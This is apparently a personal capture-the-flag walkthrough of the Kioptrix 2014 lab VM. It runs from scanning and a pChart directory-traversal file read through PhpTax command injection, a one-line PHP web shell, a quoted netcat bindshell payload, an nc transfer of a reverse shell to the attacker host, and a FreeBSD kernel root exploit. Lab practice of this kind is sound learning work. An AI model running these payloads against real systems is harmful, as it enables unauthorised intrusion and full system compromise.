# Lab setup
Download: https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2
Add a NAT-mode network adapter; the VM comes up at 192.168.74.137 (the Kali attacker box used below is 192.168.74.129).
# Information gathering
# nmap
Full TCP port sweep:
```
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds
```
Probe those three ports with version detection:
```
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
```
Port 22 is reported as closed rather than filtered: the host answered the probe with a RST, so packets to 22 get through but nothing is listening there, whereas the other 65532 ports gave no response at all. That answer comes straight from the target's TCP stack, so it says nothing about a proxy on 8080. nmap's `http-proxy` label is only its default service name for port 8080; the `-sV` scan identifies it as the same Apache instance as port 80.
# The page on port 80
Opening port 80 in a browser and viewing the page source gives a hint:
```html
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>
```
pChart is in use, so check whether it has known vulnerabilities:
```
┌──(root㉿kali)-[~]
└─# searchsploit pchart
--------------------------------------------------------- ---------------------------------
 Exploit Title                                           |  Path
--------------------------------------------------------- ---------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                  | php/webapps/31173.txt
--------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```
It does.
# Summary of leads
- pChart 2.1.3 (known vulnerabilities)
- Apache 2.2.21
- SSH brute force (not viable while 22 is closed)
- HTTP proxy on 8080 (my first guess was reGeorg; as noted above, `http-proxy` is just nmap's default label for port 8080)
# Exploitation
# pChart
Read the exploit entry:
```
┌──(root㉿kali)-[~/Desktop]
└─# cat 31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.

[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exist in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.

[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>"
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.

[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.
```
Confirm the vulnerable spot on the target. The `Script` parameter of the examples page gives an arbitrary file read: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
That returns /etc/passwd.
The XSS is there too, but it is of no use for getting onto the box.
So the only primitive in hand is a file read. It has to be combined with what is already known to collect more information.
We know Apache is running, so read its configuration. On FreeBSD the Apache 2.2 port keeps it under /usr/local/etc/apache22/: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
```apache
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>

Include etc/apache22/Includes/*.conf
```
The vhost on 8080 is gated by that `SetEnvIf` rule: only requests whose User-Agent header matches the regex `^Mozilla/4.0` get the `Mozilla4_browser` environment variable set, and `Allow from env=Mozilla4_browser` admits only those. Any other User-Agent is refused with a 403, which is why a plain browser or curl sees nothing useful there. Send the header explicitly:
```
┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
```
There is a phptax directory; take a look at it with the same header:
```
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/
```
A pile of components comes back. phptax (PhpTax, a PHP application for filling in US income-tax forms) is a packaged web application, so search Metasploit for an attack module:
```
msf6 > search phptax

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/phptax_exec  2012-10-08       excellent  Yes    PhpTax pfilez Parameter Exec Remote Code Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec
```
# phptax
Using the msf module directly, none of the available payloads worked for me, which was a pain.
searchsploit has an entry for it as well, and it is an RCE:
```
----------------------------------------------------
drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
----------------------------------------------------

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
----------------------------------------------------
```
As the quoted code shows, when `pdf=make` the `pfilez` value is interpolated unquoted into `exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep")`, so a `;` terminates the `convert` command and whatever follows runs as a separate shell command (the `include` above it runs first on the same value, but with a bogus name it only emits a warning). Note that the value is substituted twice, once as `$pfilef` and once as `$pfilep`, so the injected command executes twice; that is harmless for writing a file, but matters for anything that blocks or is not idempotent. The entry gives an exploit, but it would not work here directly. Looking into it, the reason is documented:
FreeBSD's version of nc does not ship with the execute option, which means I can't use it to get a reverse shell.
Reference: https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/
So the natural move is to write a web shell to disk and run commands through it. The simplest is a one-liner (when sent through a browser or curl, the quotes, spaces and angle brackets need to be URL-encoded): http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make
Now system commands can be run through 1.php.
wget does not exist on the target, but nc does, so move the file over with nc. (FreeBSD's base system also ships fetch(1), which would have served in place of wget.)
```
# serve the file
┌──(root㉿kali)-[~]
└─# nc -l -p 8888 < shell.php

# catch the reverse shell
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
```
Pull the file through the web shell: http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php
The target connects out to port 8888, the listener feeds it shell.php, and the redirect writes it next to 1.php. One caveat: the target's nc only exits when the Kali side closes the connection, and netcat-traditional (the one producing the `listening on [any]` output below) keeps the socket open after stdin hits EOF unless told otherwise, so start the listener as `nc -l -p 8888 -q 1 < shell.php` (or give the target side a timeout with `nc -w 2`); otherwise the web request hangs. Here shell.php is a PHP reverse shell aimed at 192.168.74.129:1234. Once it is written, requesting it directly fires the shell back to the listener:
```
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.137] 19685
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64
 3:03AM  up  2:26, 0 users, load averages: 0.11, 0.11, 0.04
USER             TTY      FROM              LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www
```
That shell runs as `www`, a low-privilege user, so the next step is privilege escalation.
# Privilege escalation
```
uname -a
```
shows the kernel is FreeBSD 9.0-RELEASE. searchsploit has local privilege-escalation exploits for it, so transfer the source the same way and compile it with the gcc present on the target:
http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c
http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c
28718.c gave me problems when compiling on the target, so I used a different one, 26368.c (the mmap/ptrace bug, CVE-2013-2171).
After transferring it, compile it with gcc and run a.out; that gives root straight away:
```
$ gcc exp.c
exp.c:89:2: warning: no newline at end of file
$ ./a.out
whoami
root
```
# Reflections
A lot of unexpected things came up, and the methods I had in mind never applied as smoothly as I expected. After getting the one-liner web shell I wanted a reverse shell, but unfamiliarity with the tools and a missing understanding of how reverse shells work underneath cost me a lot of time. Once the target turned out not to have wget, I did not know how to transfer files. The everyday tools are not as familiar as I assumed, and I need more practice.
I still cannot get to the bottom of some of the specific failures, for example why 28718.c would not run after compiling during privilege escalation, or why the reverse shell session failed to come up properly several times. Answering those needs a deep understanding of the operating system, how the tools are designed, and networking fundamentals.
There is a long road ahead……